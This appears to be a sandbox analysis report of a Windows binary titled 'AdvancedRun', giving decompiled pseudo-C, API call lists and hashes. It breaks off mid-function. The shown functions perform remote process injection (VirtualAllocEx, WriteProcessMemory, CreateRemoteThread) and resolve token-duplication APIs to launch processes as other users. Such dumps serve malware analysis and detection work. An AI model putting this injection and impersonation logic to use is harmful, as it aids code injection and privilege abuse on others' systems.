                                                                                      				void _v33432;
                                                                                      				void _v33436;
                                                                                      				intOrPtr _v66756;
                                                                                      				intOrPtr _v66760;
                                                                                      				void _v66848;
                                                                                      				void _v66852;
                                                                                      				void* __edi;
                                                                                      				void* _t76;
                                                                                      				_Unknown_base(*)()* _t84;
                                                                                      				_Unknown_base(*)()* _t87;
                                                                                      				void* _t90;
                                                                                      				signed int _t126;
                                                                                      				struct HINSTANCE__* _t128;
                                                                                      				intOrPtr* _t138;
                                                                                      				void* _t140;
                                                                                      				void* _t144;
                                                                                      				void* _t147;
                                                                                      				void* _t148;
                                                                                      
                                                                                      				E0040B550(0x10524, __ecx);
                                                                                      				_t138 = _a4;
                                                                                      				_v12 = 0;
                                                                                      				 *_t138 = 0;
                                                                                      				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                                      				_a8 = _t76;
                                                                                      				if(_t76 == 0) {
                                                                                      					 *_t138 = GetLastError();
                                                                                      					L30:
                                                                                      					return _v12;
                                                                                      				}
                                                                                      				_v33436 = 0;
                                                                                      				memset( &_v33432, 0, 0x8284);
                                                                                      				_t148 = _t147 + 0xc;
                                                                                      				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                                      				_v8 = 0;
                                                                                      				E00409C70( &_v8);
                                                                                      				_push("CreateProcessW");
                                                                                      				_push(_t128);
                                                                                      				if(_v8 == 0) {
                                                                                      					_t84 = GetProcAddress();
                                                                                      				} else {
                                                                                      					_t84 = _v8();
                                                                                      				}
                                                                                      				_v33352 = _t84;
                                                                                      				E00409C70( &_v8);
                                                                                      				_push("GetLastError");
                                                                                      				_push(_t128);
                                                                                      				if(_v8 == 0) {
                                                                                      					_t87 = GetProcAddress();
                                                                                      				} else {
                                                                                      					_t87 = _v8();
                                                                                      				}
                                                                                      				_t140 = _a28;
                                                                                      				_v33348 = _t87;
                                                                                      				if(_t140 != 0) {
                                                                                      					_t126 = 0x11;
                                                                                      					memcpy( &_v33420, _t140, _t126 << 2);
                                                                                      					_t148 = _t148 + 0xc;
                                                                                      				}
                                                                                      				_v33420 = 0x44;
                                                                                      				if(_a16 == 0) {
                                                                                      					_v33336 = 1;
                                                                                      				} else {
                                                                                      					E00404923(0x2000,  &_v33336, _a16);
                                                                                      				}
                                                                                      				if(_a12 == 0) {
                                                                                      					_v16950 = 1;
                                                                                      				} else {
                                                                                      					E00404923(0x2000,  &_v16950, _a12);
                                                                                      				}
                                                                                      				if(_a24 == 0) {
                                                                                      					_v564 = 1;
                                                                                      				} else {
                                                                                      					E00404923(0x104,  &_v564, _a24);
                                                                                      				}
                                                                                      				_v24 = _a20;
                                                                                      				_v28 = 0;
                                                                                      				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                                      				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                                      				_a12 = _t90;
                                                                                      				if(_a16 == 0 || _t90 == 0) {
                                                                                      					 *_a4 = GetLastError();
                                                                                      				} else {
                                                                                      					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
                                                                                      					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
                                                                                      					_v20 = 0;
                                                                                      					_v16 = 0;
                                                                                      					_a24 = 0;
                                                                                      					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
                                                                                      					_a28 = _t144;
                                                                                      					if(_t144 == 0) {
                                                                                      						 *_a4 = GetLastError();
                                                                                      					} else {
                                                                                      						ResumeThread(_t144);
                                                                                      						WaitForSingleObject(_t144, 0x7d0);
                                                                                      						CloseHandle(_t144);
                                                                                      					}
                                                                                      					_v66852 = 0;
                                                                                      					memset( &_v66848, 0, 0x8284);
                                                                                      					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
                                                                                      					VirtualFreeEx(_a8, _a16, 0, 0x8000);
                                                                                      					VirtualFreeEx(_a8, _a12, 0, 0x8000);
                                                                                      					if(_a28 != 0) {
                                                                                      						 *_a4 = _v66756;
                                                                                      						_v12 = _v66760;
                                                                                      						if(_a32 != 0) {
                                                                                      							asm("movsd");
                                                                                      							asm("movsd");
                                                                                      							asm("movsd");
                                                                                      							asm("movsd");
                                                                                      						}
                                                                                      					}
                                                                                      					if(_v20 != 0) {
                                                                                      						FreeLibrary(_v20);
                                                                                      					}
                                                                                      				}
                                                                                      				goto L30;
                                                                                      			}


































                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                      • memset.MSVCRT ref: 0040A4B3
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                        • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                        • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                        • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                        • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                        • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                        • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                      • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                      • memset.MSVCRT ref: 0040A66E
                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                      • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                      • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                      • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                      • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                      • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                      • API String ID: 1572607441-20550370
                                                                                      • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                      • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                      • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                      • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040289F(intOrPtr* __esi) {
                                                                                      				void* _t9;
                                                                                      				struct HINSTANCE__* _t10;
                                                                                      				_Unknown_base(*)()* _t14;
                                                                                      
                                                                                      				if( *(__esi + 0x10) == 0) {
                                                                                      					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                                      					 *(__esi + 0x10) = _t10;
                                                                                      					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                                      					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                                      					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                                      					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                                      					 *(__esi + 8) = _t14;
                                                                                      					return _t14;
                                                                                      				}
                                                                                      				return _t9;
                                                                                      			}







                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                      • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                      • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                      • API String ID: 2238633743-1970996977
                                                                                      • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                      • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                      • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                      • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 64%
                                                                                      			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                                      				void* _v8;
                                                                                      				char _v12;
                                                                                      				char* _v20;
                                                                                      				long _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				char* _v36;
                                                                                      				signed int _v40;
                                                                                      				void _v44;
                                                                                      				char _v48;
                                                                                      				char _v52;
                                                                                      				struct _OSVERSIONINFOW _v328;
                                                                                      				void* __esi;
                                                                                      				signed int _t40;
                                                                                      				intOrPtr* _t44;
                                                                                      				void* _t49;
                                                                                      				struct HINSTANCE__** _t54;
                                                                                      				signed int _t55;
                                                                                      
                                                                                      				_t54 = __eax;
                                                                                      				_v328.dwOSVersionInfoSize = 0x114;
                                                                                      				GetVersionExW( &_v328);
                                                                                      				if(_v328.dwMajorVersion < 6) {
                                                                                      					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                                      				}
                                                                                      				E0040A1EF(_t54);
                                                                                      				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                                      				if(_t44 != 0) {
                                                                                      					_t55 = 8;
                                                                                      					memset( &_v44, 0, _t55 << 2);
                                                                                      					_v12 = 0;
                                                                                      					asm("stosd");
                                                                                      					_v36 =  &_v12;
                                                                                      					_v20 =  &_v52;
                                                                                      					_v48 = 0x24;
                                                                                      					_v44 = 0x10003;
                                                                                      					_v40 = _t55;
                                                                                      					_v28 = 0x10004;
                                                                                      					_v24 = 4;
                                                                                      					_a16 = 0;
                                                                                      					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                                      					asm("sbb eax, eax");
                                                                                      					return  !( ~_t40) & _a16;
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}


                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?,74B068A0,00000000), ref: 0040A290
                                                                                      • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                        • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                        • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                      • String ID: $
                                                                                      • API String ID: 283512611-3993045852
                                                                                      • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                      • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                      • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                      • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                      				struct tagPOINT _v12;
                                                                                      				void* __esi;
                                                                                      				void* _t47;
                                                                                      				struct HBRUSH__* _t56;
                                                                                      				void* _t61;
                                                                                      				unsigned int _t63;
                                                                                      				void* _t68;
                                                                                      				struct HWND__* _t69;
                                                                                      				struct HWND__* _t70;
                                                                                      				void* _t73;
                                                                                      				unsigned int _t74;
                                                                                      				struct HWND__* _t76;
                                                                                      				struct HWND__* _t77;
                                                                                      				struct HWND__* _t78;
                                                                                      				struct HWND__* _t79;
                                                                                      				unsigned int _t85;
                                                                                      				struct HWND__* _t87;
                                                                                      				struct HWND__* _t89;
                                                                                      				struct HWND__* _t90;
                                                                                      				struct tagPOINT _t96;
                                                                                      				struct tagPOINT _t98;
                                                                                      				signed short _t103;
                                                                                      				void* _t106;
                                                                                      				void* _t117;
                                                                                      
                                                                                      				_t106 = __edx;
                                                                                      				_push(__ecx);
                                                                                      				_push(__ecx);
                                                                                      				_t47 = _a4 - 0x110;
                                                                                      				_t117 = __ecx;
                                                                                      				if(_t47 == 0) {
                                                                                      					__eflags =  *0x40feb0;
                                                                                      					if(__eflags != 0) {
                                                                                      						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                                      					} else {
                                                                                      						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                      						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                      					}
                                                                                      					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                                      					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                      					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                      					E0040103E(_t117, __eflags);
                                                                                      					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                                      					goto L30;
                                                                                      				} else {
                                                                                      					_t61 = _t47 - 1;
                                                                                      					if(_t61 == 0) {
                                                                                      						_t103 = _a8;
                                                                                      						_t63 = _t103 >> 0x10;
                                                                                      						__eflags = _t103 - 1;
                                                                                      						if(_t103 == 1) {
                                                                                      							L24:
                                                                                      							__eflags = _t63;
                                                                                      							if(_t63 != 0) {
                                                                                      								goto L30;
                                                                                      							} else {
                                                                                      								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                      								DeleteObject( *(_t117 + 0x43c));
                                                                                      								goto L8;
                                                                                      							}
                                                                                      						} else {
                                                                                      							__eflags = _t103 - 2;
                                                                                      							if(_t103 != 2) {
                                                                                      								goto L30;
                                                                                      							} else {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t68 = _t61 - 0x27;
                                                                                      						if(_t68 == 0) {
                                                                                      							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                      							__eflags = _a12 - _t69;
                                                                                      							if(_a12 != _t69) {
                                                                                      								__eflags =  *0x40ff30;
                                                                                      								if( *0x40ff30 == 0) {
                                                                                      									goto L30;
                                                                                      								} else {
                                                                                      									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                      									__eflags = _a12 - _t70;
                                                                                      									if(_a12 != _t70) {
                                                                                      										goto L30;
                                                                                      									} else {
                                                                                      										goto L18;
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								L18:
                                                                                      								SetBkMode(_a8, 1);
                                                                                      								SetTextColor(_a8, 0xc00000);
                                                                                      								_t56 = GetSysColorBrush(0xf);
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t73 = _t68 - 0xc8;
                                                                                      							if(_t73 == 0) {
                                                                                      								_t74 = _a12;
                                                                                      								_t96 = _t74 & 0x0000ffff;
                                                                                      								_v12.x = _t96;
                                                                                      								_v12.y = _t74 >> 0x10;
                                                                                      								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                      								_push(_v12.y);
                                                                                      								_a8 = _t76;
                                                                                      								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                      								__eflags = _t77 - _a8;
                                                                                      								if(_t77 != _a8) {
                                                                                      									__eflags =  *0x40ff30;
                                                                                      									if( *0x40ff30 == 0) {
                                                                                      										goto L30;
                                                                                      									} else {
                                                                                      										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                      										_push(_v12.y);
                                                                                      										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                      										__eflags = _t79 - _t78;
                                                                                      										if(_t79 != _t78) {
                                                                                      											goto L30;
                                                                                      										} else {
                                                                                      											goto L13;
                                                                                      										}
                                                                                      									}
                                                                                      								} else {
                                                                                      									L13:
                                                                                      									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                      									goto L8;
                                                                                      								}
                                                                                      							} else {
                                                                                      								if(_t73 != 0) {
                                                                                      									L30:
                                                                                      									_t56 = 0;
                                                                                      									__eflags = 0;
                                                                                      								} else {
                                                                                      									_t85 = _a12;
                                                                                      									_t98 = _t85 & 0x0000ffff;
                                                                                      									_v12.x = _t98;
                                                                                      									_v12.y = _t85 >> 0x10;
                                                                                      									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                      									_push(_v12.y);
                                                                                      									_a8 = _t87;
                                                                                      									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                      										__eflags =  *0x40ff30;
                                                                                      										if( *0x40ff30 == 0) {
                                                                                      											goto L30;
                                                                                      										} else {
                                                                                      											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                      											_push(_v12.y);
                                                                                      											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                      											__eflags = _t90 - _t89;
                                                                                      											if(_t90 != _t89) {
                                                                                      												goto L30;
                                                                                      											} else {
                                                                                      												_push(0x40ff30);
                                                                                      												goto L7;
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										_push(_t117 + 0x23e);
                                                                                      										L7:
                                                                                      										_push( *(_t117 + 0x10));
                                                                                      										E00404F7E();
                                                                                      										L8:
                                                                                      										_t56 = 1;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t56;
                                                                                      			}

                                                                                      0x004011e6
                                                                                      0x0040120e
                                                                                      0x00401216
                                                                                      0x00000000
                                                                                      0x0040121c
                                                                                      0x00401224
                                                                                      0x00401226
                                                                                      0x00401229
                                                                                      0x00000000
                                                                                      0x0040122f
                                                                                      0x00000000
                                                                                      0x0040122f
                                                                                      0x00401229
                                                                                      0x004011e8
                                                                                      0x004011e8
                                                                                      0x004011ed
                                                                                      0x004011fb
                                                                                      0x00401203
                                                                                      0x00401203
                                                                                      0x004010bb
                                                                                      0x004010bb
                                                                                      0x004010c0
                                                                                      0x00401151
                                                                                      0x0040115a
                                                                                      0x00401168
                                                                                      0x0040116b
                                                                                      0x0040116e
                                                                                      0x00401170
                                                                                      0x00401173
                                                                                      0x00401180
                                                                                      0x00401182
                                                                                      0x00401185
                                                                                      0x004011a4
                                                                                      0x004011ac
                                                                                      0x00000000
                                                                                      0x004011b2
                                                                                      0x004011ba
                                                                                      0x004011bc
                                                                                      0x004011c7
                                                                                      0x004011c9
                                                                                      0x004011cb
                                                                                      0x00000000
                                                                                      0x004011d1
                                                                                      0x00000000
                                                                                      0x004011d1
                                                                                      0x004011cb
                                                                                      0x00401187
                                                                                      0x00401187
                                                                                      0x00401199
                                                                                      0x00000000
                                                                                      0x00401199
                                                                                      0x004010c6
                                                                                      0x004010c8
                                                                                      0x004012fd
                                                                                      0x004012fd
                                                                                      0x004012fd
                                                                                      0x004010ce
                                                                                      0x004010ce
                                                                                      0x004010d7
                                                                                      0x004010e5
                                                                                      0x004010e8
                                                                                      0x004010eb
                                                                                      0x004010ed
                                                                                      0x004010f0
                                                                                      0x00401102
                                                                                      0x0040111d
                                                                                      0x00401125
                                                                                      0x00000000
                                                                                      0x0040112b
                                                                                      0x00401133
                                                                                      0x00401135
                                                                                      0x00401140
                                                                                      0x00401142
                                                                                      0x00401144
                                                                                      0x00000000
                                                                                      0x0040114a
                                                                                      0x0040114a
                                                                                      0x00000000
                                                                                      0x0040114a
                                                                                      0x00401144
                                                                                      0x00401104
                                                                                      0x0040110a
                                                                                      0x0040110b
                                                                                      0x0040110b
                                                                                      0x0040110e
                                                                                      0x00401115
                                                                                      0x00401117
                                                                                      0x00401117
                                                                                      0x00401102
                                                                                      0x004010c8
                                                                                      0x004010c0
                                                                                      0x004010b5
                                                                                      0x004010ac
                                                                                      0x00401303

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                      • String ID: AdvancedRun
                                                                                      • API String ID: 829165378-481304740
                                                                                      • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                      • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                      • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                      • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 45%
                                                                                      			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                      				void _v259;
                                                                                      				void _v260;
                                                                                      				void _v515;
                                                                                      				void _v516;
                                                                                      				char _v1048;
                                                                                      				void _v1052;
                                                                                      				void _v1056;
                                                                                      				void _v1560;
                                                                                      				long _v1580;
                                                                                      				void _v3626;
                                                                                      				char _v3628;
                                                                                      				void _v5674;
                                                                                      				char _v5676;
                                                                                      				void _v9770;
                                                                                      				short _v9772;
                                                                                      				void* __edi;
                                                                                      				void* _t45;
                                                                                      				void* _t60;
                                                                                      				int _t61;
                                                                                      				int _t63;
                                                                                      				int _t64;
                                                                                      				long _t68;
                                                                                      				struct HWND__* _t94;
                                                                                      				signed int _t103;
                                                                                      				intOrPtr _t127;
                                                                                      				unsigned int _t130;
                                                                                      				void* _t132;
                                                                                      				void* _t135;
                                                                                      
                                                                                      				E0040B550(0x2628, __ecx);
                                                                                      				_t45 = _a8 - 0x110;
                                                                                      				if(_t45 == 0) {
                                                                                      					E00404DA9(__edx, _a4, 4);
                                                                                      					_v9772 = 0;
                                                                                      					memset( &_v9770, 0, 0xffe);
                                                                                      					_t103 = 5;
                                                                                      					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                      					memset( &_v1560, 0, 0x1f6);
                                                                                      					_v260 = 0;
                                                                                      					memset( &_v259, 0, 0xff);
                                                                                      					_v516 = 0;
                                                                                      					memset( &_v515, 0, 0xff);
                                                                                      					_v5676 = 0;
                                                                                      					memset( &_v5674, 0, 0x7fe);
                                                                                      					_v3628 = 0;
                                                                                      					memset( &_v3626, 0, 0x7fe);
                                                                                      					_t135 = _t132 + 0x5c;
                                                                                      					_t60 = GetCurrentProcess();
                                                                                      					_t105 =  &_v260;
                                                                                      					_a8 = _t60;
                                                                                      					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                                      					__eflags = _t61;
                                                                                      					if(_t61 != 0) {
                                                                                      						E00404FE0( &_v5676,  &_v260, 4);
                                                                                      						_pop(_t105);
                                                                                      					}
                                                                                      					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                                      					__eflags = _t63;
                                                                                      					if(_t63 != 0) {
                                                                                      						E00404FE0( &_v3628,  &_v516, 0);
                                                                                      						_pop(_t105);
                                                                                      					}
                                                                                      					_t64 = E00404BD3();
                                                                                      					__eflags = _t64;
                                                                                      					if(_t64 == 0) {
                                                                                      						E004090EE();
                                                                                      					} else {
                                                                                      						E00409172();
                                                                                      					}
                                                                                      					__eflags =  *0x4101b8; // 0x0
                                                                                      					if(__eflags != 0) {
                                                                                      						L17:
                                                                                      						_v1056 = 0;
                                                                                      						memset( &_v1052, 0, 0x218);
                                                                                      						_t127 =  *0x40f5d4; // 0x0
                                                                                      						_t135 = _t135 + 0xc;
                                                                                      						_t68 = GetCurrentProcessId();
                                                                                      						_push(_t127);
                                                                                      						_push(_t68);
                                                                                      						 *0x40f84c = 0;
                                                                                      						E004092F0(_t105, __eflags);
                                                                                      						__eflags =  *0x40f84c; // 0x0
                                                                                      						if(__eflags != 0) {
                                                                                      							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                                      							_t135 = _t135 + 0xc;
                                                                                      							__eflags =  *0x40f84c; // 0x0
                                                                                      							if(__eflags != 0) {
                                                                                      								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                                      							}
                                                                                      						}
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						__eflags =  *0x4101bc; // 0x0
                                                                                      						if(__eflags == 0) {
                                                                                      							L20:
                                                                                      							_push( &_v3628);
                                                                                      							_push( &_v5676);
                                                                                      							_push( *0x40f3b0);
                                                                                      							_push( *0x40f3bc);
                                                                                      							_push( *0x40f3ac);
                                                                                      							_push( *0x40f394);
                                                                                      							_push( *0x40f398);
                                                                                      							_push( *0x40f3a0);
                                                                                      							_push( *0x40f3a4);
                                                                                      							_push( *0x40f39c);
                                                                                      							_push( *0x40f3a8);
                                                                                      							_push( &_v1580);
                                                                                      							_push( *0x40f5d4);
                                                                                      							_push( *0x40f5c8);
                                                                                      							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                      							_push(0x800);
                                                                                      							_push( &_v9772);
                                                                                      							L0040B1EC();
                                                                                      							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                      							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                      							L21:
                                                                                      							return 0;
                                                                                      						}
                                                                                      						goto L17;
                                                                                      					}
                                                                                      				}
                                                                                      				if(_t45 == 1) {
                                                                                      					_t130 = _a12;
                                                                                      					if(_t130 >> 0x10 == 0) {
